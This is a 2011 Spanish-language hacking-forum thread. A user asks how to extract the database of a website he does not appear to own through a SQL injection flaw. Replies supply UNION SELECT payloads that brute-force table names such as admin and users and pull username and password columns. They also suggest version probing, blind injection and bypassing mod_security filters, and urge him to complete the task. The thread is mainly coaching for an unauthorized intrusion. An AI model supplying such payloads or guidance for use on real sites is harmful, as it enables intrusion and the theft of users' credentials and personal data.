FORUM


Reload | Recent posts | New post


Ayuda con una SQLi


xAutor: xx W4rlock
Answers: 5
Date: 2011-10-25
Solved: YES

Buenas


Disculpen que los joda y mas por una SQLi donde encontras informacion por todos lados ..


pero resulta que este problema que tengo esta bastante bravo.. porlomenos con mi conocimiento..


Resulta que yo necesito una db de una pagina web.. le encontre una vuln sql, re feliz yo que la iba a conseguir, arranque con el order by.. y me daba lo mas bien error si no era aca foto ..





Llegue a order by 2 y no me tiro error, bueno ese era.. luego voy por el union select 1 2 
-1+union+select+1,2--
y no me tira nada, una imagen mas que mil palabras..





Bueno no decidi dejarla ahi porque realmente quiero la db.. segui viendo que podia hacer y se me ocurrio ver que pasaba si yo metia en el digito 2 una columna cualquiera con una tabla cualquiera.. supongamos que columna mail y tabla usuarios 
-1+union+select+1,mail+from+usuarios--
.. salia esto:




Bueno ahi vi que si daba error es porque no existia, asique fui bruteando hasta lograr encontrar columna email y la tabla registrados .. esas dos no tiraron error ..
entonces arranque a hacer la sentencia final de la sqli super ancioso.. 
-1+union+all+select+1,email+from+registrados+limit+0,1--

y el resultado fue lo mismo que cuando hice 
-1+union+select+1,2--






Intente hacer varias cosas como ver el codigo de fuente aver si habia algo que yo no viera a simple vista pero no aparecia nada.. Tambien probe blind y no .. alguna sugerencia o si saben lo que es les super agradesco, gracias.

Best Answer - Chosen by asking user


[x][x][x] Blizzacjk (11 y): posiblemente se trate de un mysql 4 podrias sacarlo a fuerza bruta intentanto cosas como

-1+union+select+1,2+from+admin--
-1+union+select+1,2+from+administrador--
-1+union+select+1,2+from+user--
-1+union+select+1,2+from+users--
-1+union+select+1,2+from+login--


probando haber si te arroja error si en alguna de esas no te sale error es porque tienes el nombre de la tabla ahora para sacar los datos algo asi


-1+union+select+1,user+from+admin--
-1+union+select+1,username+from+admin--

-1+union+select+1,password+from+admin--
-1+union+select+1,pass+from+admin--

solo es cuestion de intentar chekate el foro hay hay varios tutos buenos sobre estos metodos



Answers:



[x][x][x] Blizzacjk (11 y): posiblemente se trate de un mysql 4 podrias sacarlo a fuerza bruta intentanto cosas como

-1+union+select+1,2+from+admin--
-1+union+select+1,2+from+administrador--
-1+union+select+1,2+from+user--
-1+union+select+1,2+from+users--
-1+union+select+1,2+from+login--


probando haber si te arroja error si en alguna de esas no te sale error es porque tienes el nombre de la tabla ahora para sacar los datos algo asi


-1+union+select+1,user+from+admin--
-1+union+select+1,username+from+admin--

-1+union+select+1,password+from+admin--
-1+union+select+1,pass+from+admin--

solo es cuestion de intentar chekate el foro hay hay varios tutos buenos sobre estos metodos


[x][x][x] W4rlock (11 y): gracias blizzacjk ! el tema es que, eso ya lo encontre, es columna email y tabla registrados.. el tema es que no se como hacer para que me tire informacion si es v4 .. si sabes te re agradesco


[x][x][x] Thanatos (11 y): @@version antes que nada, y si no te muestra los numeros de la columnas en la web es porq probablementes sea un campo hidden en la wen sin visualizacion, si decis que ya tenes la columna que es email y la tabla que es registrados tendria que mostrarte la data almenos que tenga algun filtro el servidor mod_security o algo similar proba bypasseando filtros. Saludos


[x][x][x] Xhushito (11 y): Olvidaba mencionar, te equivocas cuando dices que NO PASA NADA CON BLIND, funciona con ambos, SQLi y Blind... ¡vaya programadores!.

Ánimos, ya te di algunos datos valiosos para completar tu tarea.


[x][x][x] MuldeR (11 y): prohibido publicar datos de acceso.


Para dejar un comentario Registrase o Iniciar sesión